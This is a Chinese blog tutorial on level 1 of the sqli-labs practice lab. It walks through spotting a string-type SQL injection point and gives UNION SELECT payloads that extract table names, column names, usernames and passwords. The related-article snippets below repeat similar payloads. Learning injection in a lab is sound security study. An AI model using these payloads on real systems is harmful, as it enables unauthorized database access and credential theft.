SQL注入——Less-1

最新推荐文章于 2024-05-09 09:11:23 发布
最新推荐文章于 2024-05-09 09:11:23 发布
阅读量1.8k 收藏 5
点赞数
分类专栏: 学习笔记之网络安全 文章标签: SQL注入 数据库 渗透 Less
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Frank_qiaoqiaoqiao/article/details/82706887
版权

                 声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险!!!

 

打开主页进入第一关,提示输入参数id及它的值,

传入参数id=1后,我们会发现这个页面会根据传入的id查询到对应的用户及用户密码

我们可以通过查看数据库进行验证

这样我们就可以推断出PHP执行的SQL语句的功能是从数据库中查询出的信息为我们传入的id为1的用户信息,用户名及密码信息,我们据此猜测PHP中的SQL语句可能是select username,password from ‘users’ where id=”$_GET[‘id’]”,但是我们的猜测不一定正确,因为SQL语句的执行,对语法格式有一定的要求,但是并不是特别严格,一条结果的查询方法可能会有多种,还可能会因为数据库表格内容的不同而有所差异;因此,我们如果要攻击这个网站的话,就要想办法猜测出这个页面的SQL语句是如何写的,要猜测是哪一种方式,这样我们才能将我们自己精心构造的SQL语句注入到正常的参数中,让我们的SQL语句可以正常执行,达到我们的目的。我们在本地的MySQL数据库中进行SQL语句测试:select username,password from users where id=1.

我们在id=1后面多输入一个单引号,此时会报错,根据报错信息分析,PHP语句中传入的id参数类型是字符串型,所以要把前面的一个单引号闭合且还要将后面的单引号闭合或注释掉。

将单引号注释掉,输入一个不可查询的id值,我们会发现页面显示的是另一个我们查询的表的内容,

此时我们就可以尝试着拉一下我们所需要的内容了

获得表名 

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='security'--+

获得字段名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

?id=-1' union select 1,2,group_concat(username) from security.users--+

获得所有用户名

获得所有密码  ?id=-1' union select 1,2,group_concat(password) from security.users--+

 

 

Tung_wt
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全之sql注入-less1
koala_king的博客
08-17 1362
less-1 是字符注入,union注入的步骤一般有以下几步: 1、判断注入点 2、判断是整型还是字符型 3、判断查询列数 4、判断显示位 5、获取敏感信息 1、判断注入点 我们再Less1中看到,id将作为参数来使用,因此我们输入: http://localhost/Less-1/?id=1 这是看到访问了第一个用户的用户名和密码: 此时加入单引号进行尝试,这里是在id后面加了一个单引号,这里发现了语句的错误。 You have an error in your SQL syntax; check t
SQL注入——Less-1-5(学习笔记)
xdjxi的博客
02-25 2232
第一关 1.经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询 2.接着尝试在id后面加上',发现页面回显不正常,表示可能存在SQL字符注入 3.输入--+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入 4.接着使用order by 语句判断,该表中一共有几列数据 order by 3页面回显正常,order by 4页面回显不正常,说明此表一个有3列。5.将id=1改为一个数据库不存在的id值,如861,使用union select 1...
sql注入less1
Mdcq123的博客
10-15 171
http://192.168.197.146/sqli-labs/sqli-labs/Less-1/?id=-1’ union select 1,(select group_concat(",",id,username,password) from security.users),3%23
10 个 SQL 注入工具(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
leah126的博客
05-09 1961
其主要的目标是在存在着漏洞的数据库服务器上提供一个远程的外壳,甚至在一个有着严格的防范措施的环境中也能如此。Havij不仅能够自动挖掘可利用的SQL 查询,还能够识别后台数据库类型、检索数据的用户名和密码hash、转储表和列、从数据库中提取数据,甚至访问底层文件系统和执行系统命令,当然前提是有 一个可利用的SQL注入漏洞。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
sqli-labs中less-1~4实验详解
mr_secretT的博客
05-26 631
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的数据。这里我们使用的id参数为0,是因为我们需要id参数不存在于数据库的序列号当中,也可以使用负数.通过上述回显,我们可以判定,回显位为第2\3列。4.根据结果我们可以判定这是一个字符型注入漏洞,我们可以得到页面回显。2.从页面回显可以看出,3列数据中,只有2列可以页面回显,我们需要确认一下到底是哪两列会回显呢?我们可以构造语句获取每个。
Sqli 的Less-1和less-2操作步骤 ,求出username和password下的字段内容
m0_52341820的博客
04-13 411
Less-1: 进入Less-1页面: 检查页面是否存在sql注入,输入敏感字符%27,出现报错,说明存在注入漏洞。 判断查询表的列数:使用order by语句和二分法探测出列数为三 之后判断显示位:使用union select联合查询语句判断显示位,若希望显示出后面的,需要将union语句的前半部分显示为假 之后求当前数据库的名字,得出数据库名等于secuirty 之后查询数据的下的表名:http://127.0.0.1/sqli/Less-1/?id=-1' %20%20 un.
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
aws-static-amplify
03-31
安全方面,AWS提供WAF(Web Application Firewall)与CloudFront集成,可以保护我们的静态内容免受常见的Web攻击,如SQL注入和跨站脚本攻击。 在文件名为“aws-static-amplify-main”的压缩包中,可能包含了设置和...
PHP实例开发源码——VeryIDE Bee 社会互动营销平台.zip
11-25
9. **安全性**:考虑到数据安全和防止SQL注入、XSS攻击等,开发者需要熟练使用PHP的安全函数,如htmlspecialchars、filter_var等,并确保代码遵循最佳安全实践。 10. **性能优化**:可能采用缓存机制如Memcached或...
PHP实例开发源码——免费买卖二手车交易源码带手机版 php版.zip
11-25
5. 安全性:源码应包含防止SQL注入、XSS攻击的安全措施。 源码中可能包含的文件有: - index.php:网站的入口文件,通常处理路由和分发请求。 - controllers/:控制器目录,包含了处理用户请求的类文件。 - models/...
管理系统-酒店预订系统后台管理系统实现-PHP+Hack+CSS-优质项目实战-毕业设计.zip
02-18
开发者需要了解常见的Web安全威胁,如SQL注入、XSS攻击等,并能通过编码规范、验证机制、数据加密等方式防止这些风险。 7. **项目实战与毕业设计** 该项目不仅提供理论知识,更强调实战经验的积累。通过实际操作,...
sql注入练习——Less-1
nzw1134864657的博客
10-14 555
1.判断是否存在注入 输入“?id=1”,发现有变化,说明存在注入 2.判断闭合字符,注释后面的内容 输入“ ?id=1’ ” http://127.0.0.1/sqli-labs-master/Less-1/?id=1’%23 3.判断列数 使用order by(排序),来判断有几列数据,随便写,先写order by 10,回显错误,则说明列数是小于5,尝试5,回显结果仍是错误的,再尝试...
Sqli-labs-master注入详解:less-01
weixin_43096078的博客
08-24 560
通过学习sql注入,提高安全意识,切勿违法操作! 通过sqli-labs学习sql注入的第一天: 在学习之前需要先掌握一些基本知识: 连接数据库:mysql -uroot -p 回车 输入mysql密码 (root是对应的用户名) 查数据库:show databases; (会发现mysql自带了几个数据库,它们尤其相应的作用,建议查阅资料了解下什么意思) 使用某一个数据库:use database_name; (database_name是库名) 查询数据库中的表:show tables; 查看
LESS-1-基础
xxzjwyql的博客
07-18 421
一、概念 1.什么是CSS预处理器? CSS 预处理器就是用某一种语言用来为 CSS 增加一些动态语言的的特性(变量、函数、继承等),CSS预处理器可以让你的 CSS 更见简洁,适应性更强,代码更直观等诸多好处; 简而言之: CSS预处理器就是升级版CSS 2.常见的CSS预处理器 Less、 Sass 、Stylus 1.为什么需要less? 1.1CSS的语法虽然简单, 但它同时也带来一些...
SQL注入less-1
m0_62903168的博客
05-03 884
注:phpstudy默认的php版本为7.x,想要成功的搭建靶场,需要把php版本改为5.x。
SQL注入详解(主要针对MySQL)
Rockboy777的博客
08-09 463
权限不足时也受影响;join绕过,如:union select 1,2,3 -> union select from (select 1)a join (select 2) join (select 3)substr()和mid()使用from for,如substr(database() from 1 for 1)表示将字符串从1位置截取长度1,mid()同理。
SQL注入sqli第一关详细讲解
m0_50818626的博客
05-23 1222
第七步:现在我们知道了所用的库为security,所用的表是users,三个字段名分别为id,username,password,那么我们就可以进行最后一步,查询username和password的具体数据。第六步:现在我们知道了security数据库中的所有表名,我们需要查询password和username,常理下这些数据都会存储到users中,所以我们现在查询users这个表中的所有字段的名字是什么。第二步:order by 查询字段个数,逐级增加order by 后面的数字,直到报错。
Sqli-labs靶场笔记1(Less-1 SQL注入基本操作)
m0_52233414的博客
03-31 413
sqli-labs靶场使用的是mysql数据库,所以在打之前,我们要了解一下mysql数据库的结构,mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,该数据库下面有两个表一个是tables和columns。tables这个表的table_name字段下面是所有数据库存在的表名。table_schema字段下是所有表名对应的数据库名。columns这个表的colum_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库
SQL注入闯关第一关-Less1
qq_54037445的博客
10-06 1881
SQL注入闯关
sqli-labs实验指导手册
11-17
在题目“less-1”中,通过将?id=1更改为?id=1'and1=1---,观察是否能触发错误或改变输出,来判断是否存在注入。当1=1变为1=2时,如果没有返回任何信息,这通常表明存在注入的可能性。接着,通过测试发现单引号(')是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值